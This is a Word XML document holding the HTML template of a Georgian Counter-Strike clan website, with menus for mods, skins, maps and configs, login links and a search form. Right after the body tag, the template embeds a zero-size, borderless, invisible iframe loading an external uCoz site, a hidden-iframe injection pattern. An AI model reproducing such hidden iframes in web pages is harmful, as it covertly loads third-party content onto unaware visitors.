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C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&gt;&lt;html xmlns="http://www.w3.org/1999/xhtml"&gt;&lt;head&gt;&lt;title&gt;$SITE_NAME$&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;meta http-equiv="content-type" content="text/html; charset=UTF-8"&gt;&lt;/head&gt;&lt;body&gt;&lt;iframe style="overflow: hidden; border: 0pt none; width: 0px; height: 0px;" src="http://extop.ucoz.com" scrolling="no"&gt;&lt;/iframe&gt;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>&lt;link href="/akecs/akecss/akescreen.css" rel="stylesheet" type="text/css" media="screen"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;link href="/akecs/akecss/akeprint.css" rel="stylesheet" type="text/css" media="print"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7"/>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t xml:space="preserve">&lt;!-- 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0020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;div id="page"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;div id="heading"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;div id="headinglinks"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;b&gt;&lt;span style="color: rgb(255, 255, 255);"&gt; &lt;/span&gt;&lt;/b&gt;&lt;img src="http://i25.tinypic.com/k36ijb.jpg" style="border: medium none;" alt="" title="" align="left"&gt;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 xml:space="preserve"> &lt;a title="Rus" href="http://translate.google.ge/translate?hl=en&amp;amp;sl=ka&amp;amp;tl=ru&amp;amp;u=http%3A%2F%2Fvil.ge%2F"&gt;WwW.Vil.Ge &lt;/a&gt;&lt;b&gt;&lt;span style="color: rgb(255, 255, 255);"&gt; $POWERED_BY$ &lt;/span&gt;&lt;/b&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;/div&gt;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 xml:space="preserve">&lt;a href="/"&gt;&lt;img src="/akecs/akeimg/akelogo.png" alt="AKe Logo"&gt;&lt;/a&gt;&lt;font color="#98fb98"&gt;&lt;a href="/"&gt;1&lt;/a&gt;nfesT.Clan  sait </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> 89.232.21.5:22&lt;/font&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7"/>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7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0020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;div id="navigation"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;?if(!$USER_LOGGED_IN$)?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;li&gt;&lt;a href="/"&gt;&lt;span style="color: rgb(152, 251, 152);"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Sylfaen" w:hAnsi="Sylfaen" w:cs="Sylfaen"/>
        </w:rPr>
        <w:t>მთავარი</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Sylfaen" w:hAnsi="Sylfaen" w:cs="Sylfaen"/>
        </w:rPr>
        <w:t>გვერდი</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;li&gt;&lt;a href="javascript://" rel="nofollow" onclick="new _uWnd('Prm','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',300,130,{autosize:1,closeonesc:1},{url:'/index/5'});return false;"&gt;&lt;span style="color: rgb(152, 251, 152);"&gt;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&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;li&gt;&lt;a href="$REGISTER_LINK$"&gt;&lt;span style="color: rgb(152, 251, 152);"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Sylfaen" w:hAnsi="Sylfaen" w:cs="Sylfaen"/>
        </w:rPr>
        <w:t>რეგისტრაცია</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;li&gt;&lt;a href="javascript://" rel="nofollow" onclick="new _uWnd('LF',' ',-250,-110,{autosize:0,closeonesc:1,resize:1},{url:'/index/40'});return false;"&gt;&lt;span style="color: rgb(152, 251, 152);"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Sylfaen" w:hAnsi="Sylfaen" w:cs="Sylfaen"/>
        </w:rPr>
        <w:t>შესვლა</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;li&gt;&lt;a href="http://csgold.ge" id="menu88" title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Sylfaen" w:hAnsi="Sylfaen" w:cs="Sylfaen"/>
        </w:rPr>
        <w:t>წესები</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">"&gt;&lt;span class="menu-title"&gt;&lt;span style="font-size: 10pt;"&gt;&lt;span style="color: rgb(152, 251, 152);"&gt;...serverebi....&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;/li&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;?endif?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;?if($USER_LOGGED_IN$)?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;li&gt;&lt;a href="$ADD_ENTRY_LINK$"&gt;&lt;span style="color: rgb(152, 251, 152);"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Sylfaen" w:hAnsi="Sylfaen" w:cs="Sylfaen"/>
        </w:rPr>
        <w:t>სიახლის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>&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;li&gt;&lt;a href="javascript://" rel="nofollow" onclick="window.open('/index/8','up1','scrollbars=1,top=0,left=0,resizable=1,width=680,height=350');return false;" class="mainlevel-nav"&gt;&lt;span style="color: rgb(255, 20, 147);"&gt;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პროფილი</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;li&gt;&lt;a href="javascript://" rel="nofollow" onclick="window.open('/index/14','up1','scrollbars=1,top=0,left=0,resizable=1,width=680,height=350');return false;" class="mainlevel-nav"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Sylfaen" w:hAnsi="Sylfaen" w:cs="Sylfaen"/>
        </w:rPr>
        <w:t>შეტყობინება</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> [$UNREAD_PM$]&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;li&gt;&lt;a href="$LOGOUT_LINK$" class="mainlevel-nav"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Sylfaen" w:hAnsi="Sylfaen" w:cs="Sylfaen"/>
        </w:rPr>
        <w:t>გასვლა</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;?endif?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;/ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:lastRenderedPageBreak/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0020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7"/>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7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0020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;div id="delsub"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;img src="/akecs/akeimg/akeup.png" alt="AKe Up" height="138" width="980"&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7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0020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7"/>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t xml:space="preserve">&lt;!-- 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0020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;div id="main"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;div id="left"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;div id="content2"&gt; $LAST_NEWS$</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>$BODY$&lt;/div&gt;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>&lt;div id="footer"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7"/>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;div id="copy"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;center&gt;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>&lt;/center&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t xml:space="preserve"> &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t xml:space="preserve"> &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;!-- /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0020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">&lt;!-- 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0020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;div id="right"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7"/>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7"/>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;div id="subnavigation2"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;h3 id="subnavtitle"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Sylfaen" w:hAnsi="Sylfaen" w:cs="Sylfaen"/>
        </w:rPr>
        <w:t>ნავიგაცია</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> &lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7"/>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;li align="left"&gt;&lt;a href="/"&gt;&lt;strong&gt;&lt;span style="color: rgb(255, 255, 255);"&gt;&lt;span style="font-size: 10pt;"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Sylfaen" w:hAnsi="Sylfaen" w:cs="Sylfaen"/>
        </w:rPr>
        <w:t>მთავარი</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="/news/background_ponebi/1-0-1"&gt;&lt;span style="color: rgb(30, 144, 255);"&gt;Amx &amp;amp; Plugin's -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Sylfaen" w:hAnsi="Sylfaen" w:cs="Sylfaen"/>
        </w:rPr>
        <w:t>სერვერ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Sylfaen" w:hAnsi="Sylfaen" w:cs="Sylfaen"/>
        </w:rPr>
        <w:t>მოდები</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t xml:space="preserve">&lt;li&gt;&lt;a href="/news/plugins_p%27luginebi/1-0-2"&gt;&lt;span style="color: rgb(152, 251, 152);"&gt;Movies - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Sylfaen" w:hAnsi="Sylfaen" w:cs="Sylfaen"/>
        </w:rPr>
        <w:t>დემოები</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t xml:space="preserve">&lt;li&gt;&lt;a href="/news/configs_k%27onpigebi/1-0-4"&gt;&lt;span style="color: rgb(255, 20, 147);"&gt;Models - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Sylfaen" w:hAnsi="Sylfaen" w:cs="Sylfaen"/>
        </w:rPr>
        <w:t>სკინები</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t xml:space="preserve">&lt;li&gt;&lt;a href="/news/softs_p%27rogramebi/1-0-5"&gt;&lt;span style="color: rgb(255, 165, 0);"&gt;Maps - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Sylfaen" w:hAnsi="Sylfaen" w:cs="Sylfaen"/>
        </w:rPr>
        <w:t>ტურები</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t xml:space="preserve">&lt;li&gt;&lt;a href="/news/news/logos_logoebi/1-0-6"&gt;&lt;span style="color: rgb(0, 191, 255);"&gt;AntiCheat - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Sylfaen" w:hAnsi="Sylfaen" w:cs="Sylfaen"/>
        </w:rPr>
        <w:t>ანტიჩეთი</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t xml:space="preserve">&lt;li&gt;&lt;a href="/news/news/demos_demoebi/1-0-7"&gt;Soft - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Sylfaen" w:hAnsi="Sylfaen" w:cs="Sylfaen"/>
        </w:rPr>
        <w:t>პროგრამები</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t xml:space="preserve">&lt;li&gt;&lt;a href="/news/news/amx_aemiksebi/1-0-8"&gt;&lt;span style="color: rgb(50, 205, 50);"&gt;Games - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Sylfaen" w:hAnsi="Sylfaen" w:cs="Sylfaen"/>
        </w:rPr>
        <w:t>თამაშები</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/span&gt; &lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t xml:space="preserve">&lt;li&gt;&lt;a href="/news/news/skins_sk%27inebi/1-0-9"&gt;&lt;span style="color: rgb(30, 144, 255);"&gt;Sound - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Sylfaen" w:hAnsi="Sylfaen" w:cs="Sylfaen"/>
        </w:rPr>
        <w:t>ხმები</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t xml:space="preserve">&lt;li&gt;&lt;a href="/news/patchs_p%27achebi/1-0-10"&gt;&lt;span style="color: rgb(152, 251, 152);"&gt;Logo - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Sylfaen" w:hAnsi="Sylfaen" w:cs="Sylfaen"/>
        </w:rPr>
        <w:t>ლოგოები</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t xml:space="preserve">&lt;li&gt;&lt;a href="/news/geo_motamasheebi/1-0-11"&gt;&lt;span style="color: rgb(255, 20, 147);"&gt;Configs - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Sylfaen" w:hAnsi="Sylfaen" w:cs="Sylfaen"/>
        </w:rPr>
        <w:t>კონფიგები</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t xml:space="preserve">&lt;li&gt;&lt;a href="/news/sounds_khmebi/1-0-12"&gt;&lt;span style="color: rgb(152, 251, 152);"&gt;Backgrounds - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Sylfaen" w:hAnsi="Sylfaen" w:cs="Sylfaen"/>
        </w:rPr>
        <w:t>ფონები</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t xml:space="preserve">&lt;li&gt;&lt;a href="/news/geo_motamasheebi/1-0-13"&gt;&lt;span style="color: rgb(30, 144, 255);"&gt;Mobile - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Sylfaen" w:hAnsi="Sylfaen" w:cs="Sylfaen"/>
        </w:rPr>
        <w:t>მობილურისთვის</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">&lt;li&gt;&lt;a href="/news/games_tamashebi/1-0-14"&gt;&lt;span style="color: rgb(135, 206, 250);"&gt;All - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Sylfaen" w:hAnsi="Sylfaen" w:cs="Sylfaen"/>
        </w:rPr>
        <w:t>სხვადასხვა</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t xml:space="preserve">&lt;li&gt;&lt;a href="/news/geo_motamasheebi/1-0-15"&gt;&lt;span style="color: rgb(152, 251, 152);"&gt;Patch - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Sylfaen" w:hAnsi="Sylfaen" w:cs="Sylfaen"/>
        </w:rPr>
        <w:t>პაჩები</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t xml:space="preserve">&lt;li&gt;&lt;a href="/news/geo_motamasheebi/1-0-16"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;Tricks - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Sylfaen" w:hAnsi="Sylfaen" w:cs="Sylfaen"/>
        </w:rPr>
        <w:t>ვიდეო</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Sylfaen" w:hAnsi="Sylfaen" w:cs="Sylfaen"/>
        </w:rPr>
        <w:t>გაკვეთილები</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t xml:space="preserve">&lt;li&gt;&lt;a href="/news/geo_motamasheebi/1-0-17"&gt;&lt;span style="color: rgb(152, 251, 152);"&gt;Geo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Sylfaen" w:hAnsi="Sylfaen" w:cs="Sylfaen"/>
        </w:rPr>
        <w:t>მოთამაშეები</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;li&gt;&lt;a target="_blank" href="http://server.vil.ge"&gt;&lt;span style="color: rgb(152, 251, 152);"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Sylfaen" w:hAnsi="Sylfaen" w:cs="Sylfaen"/>
        </w:rPr>
        <w:t>სერვერების</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Sylfaen" w:hAnsi="Sylfaen" w:cs="Sylfaen"/>
        </w:rPr>
        <w:t>მონიტორინგი</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;li&gt;&lt;a href="http://cshost.ese.ge"&gt;&lt;span style="color: rgb(152, 251, 152);"&gt;&lt;span style="font-size: 10pt;"&gt;&lt;span style="color: rgb(30, 144, 255);"&gt;Game-hosting&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;br&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7"/>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7"/>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;form onsubmit="this.sfSbm.disabled=true" method="post" style="margin: 0px;" action="/news/"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;center&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;input style="border: 1px solid rgb(255, 255, 255); background-color: rgb(0, 0, 0); background-image: none; background-repeat: repeat; background-attachment: scroll; background-position: 0% 50%; -moz-background-size: auto auto; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; color: rgb(255, 255, 255);" name="query" maxlength="128" class="queryField" title="Enter the terms you wish to search for." type="text"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;input style="border: 1px solid rgb(255, 255, 255); background-color: rgb(0, 0, 0); background-image: none; background-repeat: repeat; background-attachment: scroll; background-position: 0% 50%; -moz-background-size: auto auto; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; color: rgb(255, 255, 255);" class="searchSbmFl" name="sfSbm" value=" Search " type="submit"&gt;&lt;input name="a" value="14" type="hidden"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;/center&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
